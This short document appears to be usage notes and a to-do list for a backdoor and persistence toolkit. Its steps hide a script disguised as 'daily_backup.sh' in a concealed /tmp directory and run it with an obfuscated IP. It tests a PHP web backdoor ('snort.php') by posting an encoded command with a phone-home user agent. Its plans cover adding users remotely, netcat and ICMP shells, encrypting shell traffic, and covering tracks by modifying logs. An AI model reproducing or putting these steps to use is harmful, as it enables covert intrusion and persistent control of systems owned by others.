- Kali 1.1.0, CentOS 6.5, Ubuntu 14.04.2
-
$ mkdir -p /tmp/.root/.home/.user/
-
$ mv daily_backup.sh /tmp/.root/.home/.user/
-
$ chmod u+x daily_backup.sh
-
$ ./daily_backup.sh -i "Obfuscated IP"
-
You can test snort.php with the following
-
-> $ curl -d "eFh4R2VuPE93bmVkIEJ5IEcwZHoxbGw0PkdlbnhYeA==" -A "H4x0r Lit3 - Ph0n3H0m3 v1.0" http://localhost/snort.php
- Backup shell errors, needs to be worked on
- Generated Scripts may need some work, polishing, fixing
- Copying .history/.bash_history every run is a little excessive
- Fix script to check for addUser command from snort.php and fix script to execute the command
- Took out bash listeners since I cannot background the bash listeners
- Took out netcat listners due to issues (Will fix and add in later)
- [De]obsufscation of IP Address is broken, temporarily taken out until fixed -- Normal Deobf/Obf functions work
- Create variations of th script to match the level of threat actor
- e.g. - level 0/1 - Script Kiddie, no tracks covering
-
level X - Quiet, no history deletion, logs modified, etc. - Use ICMPShell?
- Encrypt nc/shell traffic?
- Fix formatting
- Add comments/Remove comments
- Speed up processing time.
- Special thanks to Justin Wray (Synister Syntax)